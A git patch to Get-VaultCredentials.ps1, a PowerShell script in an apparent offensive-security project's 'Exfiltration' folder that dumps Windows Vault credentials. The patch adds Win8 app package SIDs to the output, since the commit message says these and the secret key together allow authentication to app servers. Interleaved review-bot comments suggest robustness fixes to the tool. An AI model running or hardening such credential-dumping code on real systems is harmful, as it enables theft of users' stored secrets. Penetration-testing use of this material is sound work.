From 3444a0700e07e2471e894ce50af69552665e3fbe Mon Sep 17 00:00:00 2001
From: mattifestation
Date: Sat, 31 May 2014 21:22:22 -0400
Subject: Updated Get-VaultCredentials - Package SID

Package SIDs are now displayed for Win8 apps. Both the package SID and secret key are requirements for authenticating to Win8 app servers.
---
 Exfiltration/Get-VaultCredentials.ps1 | 17 ++++++++++++++++-
 Exfiltration/Get-VaultCredentials.ps1xml | 3 +++
 2 files changed, 19 insertions(+), 1 deletion(-)

(limited to 'Exfiltration')

diff --git a/Exfiltration/Get-VaultCredentials.ps1 b/Exfiltration/Get-VaultCredentials.ps1
index c51cc7f..4c33127 100644
--- a/Exfiltration/Get-VaultCredentials.ps1
+++ b/Exfiltration/Get-VaultCredentials.ps1
@@ -235,13 +235,19 @@ Only web credentials can be displayed in cleartext.
 [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid])
 }
+ $VAULT_ELEMENT_TYPE::Sid {
+ $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
+ Write-Verbose "0x$($SidPtr.ToString('X8'))"
+ $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)
+ $SidObject.Value
+ }
+
 # These elements are currently unimplemented.
 # I have yet to see these used in practice.
 $VAULT_ELEMENT_TYPE::ByteArray { $null }
 $VAULT_ELEMENT_TYPE::TimeStamp { $null }
 $VAULT_ELEMENT_TYPE::ProtectedArray { $null }
 $VAULT_ELEMENT_TYPE::Attribute { $null }
- $VAULT_ELEMENT_TYPE::Sid { $null }
 $VAULT_ELEMENT_TYPE::Last { $null }
 }
 }
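Review bot: The new Sid case hands whatever ReadIntPtr returns straight to the SecurityIdentifier(IntPtr) constructor, so an element whose PSID pointer is zero (or points at bytes that are not a well-formed SID) throws and aborts the whole enumeration, instead of yielding $null the way the neighbouring unimplemented cases do. Guard the pointer before the cast: `if ($SidPtr -eq [IntPtr]::Zero) { $null } else { ([Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)).Value }`, and consider wrapping the construction in try/catch that writes a warning and returns $null so one malformed element cannot hide the rest of the vault. The `Write-Verbose` of the raw pointer value is debug noise that could go once this path is stable. The enclosing switch (presumably the body of Get-VaultElementValue) starts before this hunk, so I cannot see whether an outer try/catch already covers it.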
@@ -363,10 +369,19 @@ Only web credentials can be displayed in cleartext.
 $Credential = $null
 }
+ $PackageSid = $null
+
+ if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero))
+ {
+ $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid
+ }
+
+
 $Properties = @{
 Vault = $VaultType
 Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null }
 Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null }
+ PackageSid = $PackageSid
 Credential = $Credential
 LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified)
 }
diff --git a/Exfiltration/Get-VaultCredentials.ps1xml b/Exfiltration/Get-VaultCredentials.ps1xml
index 7b3f568..33e909f 100644
--- a/Exfiltration/Get-VaultCredentials.ps1xml
+++ b/Exfiltration/Get-VaultCredentials.ps1xml
@@ -22,6 +22,9 @@ Credential + + PackageSid + LastModified
--
cgit v1.2.3
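Review bot: The guard `$CurrentItem.pPackageSid -and (...)` relies on a missing member silently evaluating to $null — as far as I can tell an [IntPtr] struct is always truthy in PowerShell, so the first operand only matters when the item was marshalled with a layout that has no pPackageSid field at all, and under `Set-StrictMode` that access throws instead of returning $null. Make the intent explicit, e.g. `if ($CurrentItem.PSObject.Properties['pPackageSid'] -and $CurrentItem.pPackageSid -ne [IntPtr]::Zero)`, with a comment such as `# pPackageSid is only present in the Win8+ VAULT_ITEM layout; older layouts have no package SID`. The Zero check is the right one — note that the existing Resource and Identity lines only test truthiness, which for an IntPtr never filters a null pointer, so the same `-ne [IntPtr]::Zero` test would be worth adding there for consistency. Since the commit message treats PackageSid plus the secret as the pair needed to authenticate, the function's comment-based help (outside this hunk) should document the new PackageSid output property and state that it is $null for non-app credentials.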